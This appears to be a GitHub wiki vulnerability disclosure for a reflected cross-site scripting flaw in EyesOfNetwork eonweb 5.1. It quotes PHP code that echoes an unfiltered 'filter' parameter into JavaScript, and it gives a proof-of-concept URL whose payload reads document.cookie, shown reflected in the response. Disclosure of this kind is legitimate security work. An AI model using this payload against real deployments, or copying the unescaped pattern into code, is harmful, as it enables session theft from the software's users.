eyesofnetwork_eonweb 5.1_filter_cross site scripting (XSS)
Clone this wiki locally
Eonweb_module_module_filters_index.php cross-site scripting (XSS)
Powered by shaojiejiang from SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
0x01
module/module_filters/module_filters.php Line 32
<script type="text/javascript">
// on page load
$(document).ready(function() {
$('#loading').hide();
var filter = "<?php echo (isset($_GET["filter"])) ? $_GET["filter"] : false ?>";
$("#filter_choice option[name='"+filter+"']").attr("selected","yes");
$_GET["filter"] has not been filtered to cause cross-site scripting (XSS)
EXP:
https://192.168.227.169/module/module_filters/index.php?filter=</script><script>alert(document.cookie)</script>
the return page has the payload:
<script type="text/javascript">
// on page load
$(document).ready(function() {
$('#loading').hide();
var filter = "</script><script>alert(document.cookie)</script>";
$("#filter_choice option[name='"+filter+"']").attr("selected","yes");
updateFields("/cache/admin-ged.xml");
});